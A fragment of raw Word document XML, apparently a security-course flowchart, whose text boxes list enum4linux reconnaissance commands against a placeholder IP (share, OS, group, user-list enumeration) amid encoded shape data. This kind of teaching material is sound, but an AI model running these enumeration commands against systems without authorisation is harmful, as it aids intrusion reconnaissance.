                <wp:effectExtent l="38100" t="0" r="8255" b="3048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351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5040" id="Down Arrow 43" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:203pt;margin-top:9.85pt;width:36.85pt;height:2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fleAIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0Xx2n6ceCOkXQosOA&#10;oi3WDj0rshQbkESNUuJkv36U7LhFW+wwLAeFFMlH8pnUxeXOGrZVGFpwFS+PJpwpJ6Fu3briP59u&#10;vpxzFqJwtTDgVMX3KvDLxedPF52fqyk0YGqFjEBcmHe+4k2Mfl4UQTbKinAEXjkyakArIqm4LmoU&#10;HaFbU0wnk9OiA6w9glQh0O11b+SLjK+1kvFe66AiMxWn2mI+MZ+rdBaLCzFfo/BNK4cyxD9UYUXr&#10;KOkIdS2iYBts30HZViIE0PFIgi1A61aq3AN1U07edPPYCK9yL0RO8CNN4f/ByrvtA7K2rvjsmDMn&#10;LH2ja+gcWyJCx+iSGOp8mJPjo3/AQQskpnZ3Gm36p0bYLrO6H1lVu8gkXc5Oz8szApdkOj4py+PM&#10;evES7DHEbwosS0LFa0qfs2dCxfY2RMpK/gc/UlJFfQ1ZinujUhnG/VCauqGs0xyd50hdGWRbQRMg&#10;pFQulr2pEbXqr08m9EuNUpIxImsZMCHr1pgRewBIM/oeu4cZ/FOoymM4Bk/+VlgfPEbkzODiGGxb&#10;B/gRgKGuhsy9/4GknprE0grqPX1rhH4Jgpc3LRF+K0J8EEhTT/tBmxzv6dAGuorDIHHWAP7+6D75&#10;0zCSlbOOtqji4ddGoOLMfHc0pl/L2SytXVZmJ2dTUvC1ZfXa4jb2CugzlfRmeJnF5B/NQdQI9pkW&#10;fpmykkk4SbkrLiMelKvYbzc9GVItl9mNVs2LeOsevUzgidU0S0+7Z4F+mLpI43oHh40T8zdz1/um&#10;SAfLTQTd5qF84XXgm9Y0D87wpKR34LWevV4evsUfAAAA//8DAFBLAwQUAAYACAAAACEA+k0sJN0A&#10;AAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KgdWpo2xKkQEpyhRIijGy9J&#10;wF6H2G0DX8/2BLcdzWj2TbmZvBMHHGMfSEM2UyCQmmB7ajXULw9XKxAxGbLGBUIN3xhhU52flaaw&#10;4UjPeNimVnAJxcJo6FIaCilj06E3cRYGJPbew+hNYjm20o7myOXeyWulltKbnvhDZwa877D53O69&#10;hp9eNso/vSb1Nv/6eMxcnc2p1vryYrq7BZFwSn9hOOEzOlTMtAt7slE4DQu15C2JjXUOggOL/HTs&#10;NOQ3CmRVyv8Lql8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAl9uX5XgCAABABQAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA+k0sJN0AAAAJAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" adj="10800" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="003229F4" w:rsidRDefault="001C6DF3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23DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3043123</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>30480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2346960" cy="627380"/>
                <wp:effectExtent l="0" t="0" r="15240" b="2032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27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jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux -S IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr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  <w:t>&gt;&gt; -S =Share information</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6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7" o:spid="_x0000_s1047" style="position:absolute;margin-left:239.6pt;margin-top:2.4pt;width:184.8pt;height:4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5TcwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95E2lAIVKapATJMQ&#10;VLyIz65jt9Ecn3d2m3S/fmcnDYghbZr2JfH53p97zheXbW3YTqGvwBZ8fDTiTFkJZWXXBX9+uvly&#10;xpkPwpbCgFUF3yvPL+efP100bqZy2IApFTIKYv2scQXfhOBmWeblRtXCH4FTlpQasBaBRFxnJYqG&#10;otcmy0ejadYAlg5BKu/p9rpT8nmKr7WS4V5rrwIzBafaQvpi+q7iN5tfiNkahdtUsi9D/EMVtags&#10;JR1CXYsg2Bar30LVlUTwoMORhDoDrSupUg/UzXj0rpvHjXAq9ULgeDfA5P9fWHm3WyKryoJPTjmz&#10;oqYZPcDWlqpkD4SesGujGOkIqMb5Gdk/uiX2kqdj7LrVWMc/9cPaBO5+AFe1gUm6zI8n0/MpzUCS&#10;bpqfHp8l9LNXb4c+fFVQs3goOMYyYg0JWLG79YHSkv3BjoRYUldEOoW9UbEOYx+Upq4o7Th5Jz6p&#10;K4NsJ4gJQkplw0lsiuIl6+imK2MGx/zPjr19dFWJa4PzX2QdPFJmsGFwrisL+FH28vu4L1l39gcE&#10;ur4jBKFdtWmceTKNVyso9zRjhI783smbigC+FT4sBRLbaSa0weGePtpAU3DoT5xtAH9+dB/tiYSk&#10;5ayh7Sm4/7EVqDgz3yzR83w8mcR1S8Lk5DQnAd9qVm81dltfAY1lTG+Fk+kY7YM5HDVC/UKLvohZ&#10;SSWspNwFlwEPwlXotpqeCqkWi2RGK+ZEuLWPTh6IELnz1L4IdD3LAvHzDg6bJmbveNbZxhFZWGwD&#10;6CqR8BXXfgS0nolL/VMS9/+tnKxeH7z5LwAAAP//AwBQSwMEFAAGAAgAAAAhACptSFnbAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyo3RC1IY1TUQQHjrQ8gBtvk6jxOoqd&#10;H3h6lhPcZjWj2W+K/eI6MeEQWk8a1isFAqnytqVaw+fp7SEDEaIhazpPqOELA+zL25vC5NbP9IHT&#10;MdaCSyjkRkMTY59LGaoGnQkr3yOxd/GDM5HPoZZ2MDOXu04mSm2kMy3xh8b0+NJgdT2OTsOrPVzs&#10;+5XG7cGF/ntOE6OmROv7u+V5ByLiEv/C8IvP6FAy09mPZIPoNKTbp4SjLHgB+1masThzUD1uQJaF&#10;/L+g/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA9gY5TcwIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAqbUhZ2wAAAAkBAAAPAAAAAAAA&#10;AAAAAAAAAM0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jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux -S IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3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  <w:t>&gt;&gt; -S =Share information</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6D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23DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>306497</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31247</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2286000" cy="627683"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2032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2768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ind w:left="-270"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux –h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="00B90091">
                            <w:pPr>
                              <w:ind w:left="-270"/>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">                        &gt;&gt; Help</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:ind w:left="-270"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:ind w:left="-27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4" o:spid="_x0000_s1048" style="position:absolute;margin-left:24.15pt;margin-top:2.45pt;width:180pt;height:4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hXcQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0iblQJVU1QVMU1C&#10;gICJZ9ex22iOzzu7Tbq/fmcnDYghbZr2kvh83/3+zvPLtjZsr9BXYAs+PhlxpqyEsrKbgn97uv50&#10;zpkPwpbCgFUFPyjPLxcfP8wbN1M5bMGUChk5sX7WuIJvQ3CzLPNyq2rhT8ApS0oNWItAIm6yEkVD&#10;3muT5aPRNGsAS4cglfd0e9Up+SL511rJcKe1V4GZglNuIX0xfdfxmy3mYrZB4baV7NMQ/5BFLSpL&#10;QQdXVyIItsPqN1d1JRE86HAioc5A60qqVANVMx69qeZxK5xKtVBzvBva5P+fW3m7v0dWlQWfTDiz&#10;oqYZPcDOlqpkD9Q9YTdGMdJRoxrnZ4R/dPfYS56OsepWYx3/VA9rU3MPQ3NVG5ikyzw/n45GNANJ&#10;uml+Nj3/HJ1mL9YOffiioGbxUHCMacQcUmPF/saHDn/EkXFMqUsincLBqJiHsQ9KU1UUdpysE5/U&#10;yiDbC2KCkFLZcNrHT+hopitjBsP8z4Y9PpqqxLXB+C+iDhYpMtgwGNeVBXwvevl93KesO/yxA13d&#10;sQWhXbdpnHkeofFqDeWBZozQkd87eV1Rg2+ED/cCie00E9rgcEcfbaApOPQnzraAP9+7j3giIWk5&#10;a2h7Cu5/7AQqzsxXS/S8GE8mcd2SMDk9y0nA15r1a43d1SugsYzprXAyHSM+mONRI9TPtOjLGJVU&#10;wkqKXXAZ8CisQrfV9FRItVwmGK2YE+HGPjp5JELkzlP7LND1LAvEz1s4bpqYveFZh40jsrDcBdBV&#10;IuFLX/sR0HomLvdPSdz/13JCvTx4i18AAAD//wMAUEsDBBQABgAIAAAAIQDUMTkg2wAAAAgBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSH0Ha5G4UZs0oiXEqVpUDhwpPMA2dpOo8TqKnZ/y&#10;9GxPcFqN5tPsTL6dXStG24fGk4anpQJhqfSmoUrD99f74wZEiEgGW09Ww9UG2BaLuxwz4yf6tOMx&#10;VoJDKGSooY6xy6QMZW0dhqXvLLF39r3DyLKvpOlx4nDXykSpZ+mwIf5QY2ffaltejoPTcDD7s/m4&#10;0LDeu9D9TGmCaky0frifd68gop3jHwy3+lwdCu508gOZIFoN6WbFJN8XEGyn6qZPzKnVGmSRy/8D&#10;il8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIszIV3ECAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA1DE5INsAAAAIAQAADwAAAAAAAAAA&#10;AAAAAADL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ind w:left="-270"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux –h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="00B90091">
                      <w:pPr>
                        <w:ind w:left="-270"/>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">                        &gt;&gt; Help</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:ind w:left="-270"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:ind w:left="-27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F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="001C6DF3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5158"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRDefault="0028154B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23DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>143510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2286000" cy="634365"/>
                <wp:effectExtent l="0" t="0" r="19050" b="1333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4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jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux -o IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; -o = Get OS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5" o:spid="_x0000_s1049" style="position:absolute;margin-left:24.1pt;margin-top:11.3pt;width:180pt;height:49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KfcgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95E2lA4qUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAWfHk04U1ZCWdlNwb89XX86&#10;5cwHYUthwKqCH5TnF8uPH84bt1A5bMGUChkFsX7RuIJvQ3CLLPNyq2rhj8ApS0oNWItAIm6yEkVD&#10;0WuT5ZPJPGsAS4cglff096pT8mWKr7WS4U5rrwIzBafaQjoxnet4ZstzsdigcNtK9mWIf6iiFpWl&#10;pGOoKxEE22H1W6i6kggedDiSUGegdSVV6oG6mU7edPO4FU6lXggc70aY/P8LK2/398iqsuCzE86s&#10;qGlGD7CzpSrZA6En7MYoRjoCqnF+QfaP7h57ydM1dt1qrOOX+mFtAvcwgqvawCT9zPPT+WRCM5Ck&#10;mx/PjucpaPbi7dCHLwpqFi8Fx1hGrCEBK/Y3PlBash/sSIgldUWkWzgYFesw9kFp6orSTpN34pO6&#10;NMj2gpggpFQ2DPmTdXTTlTGjY/5nx94+uqrEtdH5L7KOHikz2DA615UFfC97+X0a50AQ6M5+QKDr&#10;O0IQ2nWbxpkfDyNbQ3mgGSN05PdOXlcE8I3w4V4gsZ1mQhsc7ujQBpqCQ3/jbAv4873/0Z5ISFrO&#10;GtqegvsfO4GKM/PVEj3PprNZXLckzE4+5yTga836tcbu6kugsUzprXAyXaN9MMNVI9TPtOirmJVU&#10;wkrKXXAZcBAuQ7fV9FRItVolM1oxJ8KNfXRyIELkzlP7LND1LAvEz1sYNk0s3vCss40jsrDaBdBV&#10;ImGEusO1HwGtZxpM/5TE/X8tJ6uXB2/5CwAA//8DAFBLAwQUAAYACAAAACEAEsIIMdsAAAAJAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzWV2FG7VihViFNRBAuWFD7AjadJ1Hgcxc4D&#10;vp7pCpYz9+jOmWK/+E5MOMQ2kIHNWoFAqoJrqTbw9fl2vwMRkyVnu0Bo4Bsj7Mvbm8LmLsz0gdMx&#10;1YJLKObWQJNSn0sZqwa9jevQI3F2DoO3icehlm6wM5f7TmqlttLblvhCY3t8abC6HEdv4NUdzu79&#10;QuPjwcf+Z860VZM25m61PD+BSLikPxiu+qwOJTudwkguis5AttNMGtB6C4LzTF0XJwa1fgBZFvL/&#10;B+UvAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADwuYp9yAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABLCCDHbAAAACQEAAA8AAAAAAAAA&#10;AAAAAAAAzA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jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux -o IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; -o = Get OS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3DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3050235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>144399</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2346960" cy="634365"/>
                <wp:effectExtent l="0" t="0" r="15240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34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jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux -G IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; -G = Group Information</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6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9" o:spid="_x0000_s1050" style="position:absolute;margin-left:240.2pt;margin-top:11.35pt;width:184.8pt;height:49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G/cQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95G2hA4qUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAWfHk04U1ZCWdlNwb89XX86&#10;5cwHYUthwKqCH5TnF8uPH84bt1Az2IIpFTIKYv2icQXfhuAWWeblVtXCH4FTlpQasBaBRNxkJYqG&#10;otcmm00m86wBLB2CVN7T36tOyZcpvtZKhjutvQrMFJxqC+nEdK7jmS3PxWKDwm0r2Zch/qGKWlSW&#10;ko6hrkQQbIfVb6HqSiJ40OFIQp2B1pVUqQfqZjp5083jVjiVeiFwvBth8v8vrLzd3yOryoLnZ5xZ&#10;UdOMHmBnS1WyB0JP2I1RjHQEVOP8guwf3T32kqdr7LrVWMcv9cPaBO5hBFe1gUn6OTvO52dzmoEk&#10;3fw4P56fxKDZi7dDH74oqFm8FBxjGbGGBKzY3/jQ2Q925BxL6opIt3AwKtZh7IPS1BWlnSbvxCd1&#10;aZDtBTFBSKlsGPIn6+imK2NGx9mfHXv76KoS10bnv8g6eqTMYMPoXFcW8L3s5fdpD5nu7AcEur4j&#10;BKFdt2mcs3wY2RrKA80YoSO/d/K6IoBvhA/3AontNBPa4HBHhzbQFBz6G2dbwJ/v/Y/2RELSctbQ&#10;9hTc/9gJVJyZr5boeTbN87huSchPPs9IwNea9WuN3dWXQGOZ0lvhZLpG+2CGq0aon2nRVzErqYSV&#10;lLvgMuAgXIZuq+mpkGq1Sma0Yk6EG/vo5ECEyJ2n9lmg61kWiJ+3MGyaWLzhWWcbR2RhtQugq0TC&#10;CHWHaz8CWs/E5f4pifv/Wk5WLw/e8hcAAAD//wMAUEsDBBQABgAIAAAAIQDwUk/93AAAAAoBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqI0V2ijEqSiCBUsKHzCN3SRqPI5i5wFf&#10;z7CC5WiO7j233K++F7MbYxfIwP1GgXBUB9tRY+Dz4/UuBxETksU+kDPw5SLsq+urEgsbFnp38zE1&#10;gkMoFmigTWkopIx16zzGTRgc8e8cRo+Jz7GRdsSFw30vtVJb6bEjbmhxcM+tqy/HyRt4sYezfbvQ&#10;tDv4OHwvmUY1a2Nub9anRxDJrekPhl99VoeKnU5hIhtFbyDLVcaoAa13IBjIHxSPOzGp9RZkVcr/&#10;E6ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJ98ob9xAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPBST/3cAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAy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jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux -G IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; -G = Group Information</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6D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F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="0028154B" w:rsidP="005F0D9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23DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>292100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>254279</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2300707" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="2349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707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jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux -U IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">            &gt;&gt; -U = Get user list</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6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6" o:spid="_x0000_s1051" style="position:absolute;margin-left:23pt;margin-top:20pt;width:181.15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B4cwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9r2zAQfh/sfxB6X+1kabOFOCWkdAxK&#10;G9qOPiuylJjJOu2kxM7++p1kxy1dYWPsxdbpfn/3neaXbW3YQaGvwBZ8dJZzpqyEsrLbgn97vP7w&#10;iTMfhC2FAasKflSeXy7ev5s3bqbGsANTKmQUxPpZ4wq+C8HNsszLnaqFPwOnLCk1YC0CibjNShQN&#10;Ra9NNs7zi6wBLB2CVN7T7VWn5IsUX2slw53WXgVmCk61hfTF9N3Eb7aYi9kWhdtVsi9D/EMVtags&#10;JR1CXYkg2B6r30LVlUTwoMOZhDoDrSupUg/UzSh/1c3DTjiVeiFwvBtg8v8vrLw9rJFVZcEnF5xZ&#10;UdOM7mFvS1Wye0JP2K1RjHQEVOP8jOwf3Bp7ydMxdt1qrOOf+mFtAvc4gKvawCRdjj/m+TSfciZJ&#10;dzGZTvOEfvbs7dCHLwpqFg8Fx1hGrCEBKw43PlBasj/ZkRBL6opIp3A0KtZh7L3S1BWlHSXvxCe1&#10;MsgOgpggpFQ2nMemKF6yjm66MmZwHP/ZsbePripxbXD+i6yDR8oMNgzOdWUB38pefh/1JevO/oRA&#10;13eEILSbNo1znLqLVxsojzRjhI783snrigC+ET6sBRLbaS9og8MdfbSBpuDQnzjbAf586z7aEwlJ&#10;y1lD21Nw/2MvUHFmvlqi5+fRZBLXLQmT8+mYBHyp2bzU2H29AhrLiN4KJ9Mx2gdzOmqE+okWfRmz&#10;kkpYSbkLLgOehFXotpqeCqmWy2RGK+ZEuLEPTp6IELnz2D4JdD3LAvHzFk6bJmaveNbZxhFZWO4D&#10;6CqR8BnXfgS0nolL/VMS9/+lnKyeH7zFLwAAAP//AwBQSwMEFAAGAAgAAAAhAGnS2P/bAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoTYhKFeJUFMGBIy0fsI23SdR4HcVO&#10;Uvh6lhOcRqsZzb4ptxffq5nG2AW2cL8yoIjr4DpuLHwe3u42oGJCdtgHJgtfFGFbXV+VWLiw8AfN&#10;+9QoKeFYoIU2paHQOtYteYyrMBCLdwqjxyTn2Gg34iLlvteZMWvtsWP50OJALy3V5/3kLby63cm9&#10;n3l63Pk4fC95hmbOrL29uTw/gUp0SX9h+MUXdKiE6RgmdlH1FvK1TEmiRlT83GweQB0lmGcGdFXq&#10;/wuqHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCbM8B4cwIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBp0tj/2wAAAAkBAAAPAAAAAAAA&#10;AAAAAAAAAM0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jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux -U IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">            &gt;&gt; -U = Get user list</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6D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23DB8B" wp14:editId="78AA2EF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3049905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>262255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2346960" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="1524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DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>enum4linux -i IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; -i = network interface</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6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DB8B" id="Rounded Rectangle 48" o:spid="_x0000_s1052" style="position:absolute;margin-left:240.15pt;margin-top:20.65pt;width:184.8pt;height:5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5cwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjZJQ4AoGxQFUVVC&#10;gICKZ8drJ6t6Pe7YyW769R17LyCK1Krqi9ezcz9zxovLpjLsoNCXYHM+PhlxpqyEorTbnH97uv50&#10;zpkPwhbCgFU5PyrPL5cfPyxqN1cT2IEpFDIKYv28djnfheDmWeblTlXCn4BTlpQasBKBRNxmBYqa&#10;olcmm4xGs6wGLByCVN7T36tWyZcpvtZKhjutvQrM5JxqC+nEdG7imS0XYr5F4Xal7MoQ/1BFJUpL&#10;SYdQVyIItsfyt1BVKRE86HAiocpA61Kq1AN1Mx696eZxJ5xKvRA43g0w+f8XVt4e7pGVRc6nNCkr&#10;KprRA+xtoQr2QOgJuzWKkY6Aqp2fk/2ju8dO8nSNXTcaq/ilfliTwD0O4KomMEk/J5+ns4sZzUCS&#10;bjY9Oxsl9LMXb4c+fFFQsXjJOcYyYg0JWHG48YHSkn1vR0IsqS0i3cLRqFiHsQ9KU1eUdpy8E5/U&#10;2iA7CGKCkFLZcBqbonjJOrrp0pjBcfJnx84+uqrEtcH5L7IOHikz2DA4V6UFfC978X3claxb+x6B&#10;tu8IQWg2TRrnZNaPbAPFkWaM0JLfO3ldEsA3wod7gcR2mgltcLijQxuocw7djbMd4M/3/kd7IiFp&#10;Oatpe3Luf+wFKs7MV0v0vBhPp3HdkjA9P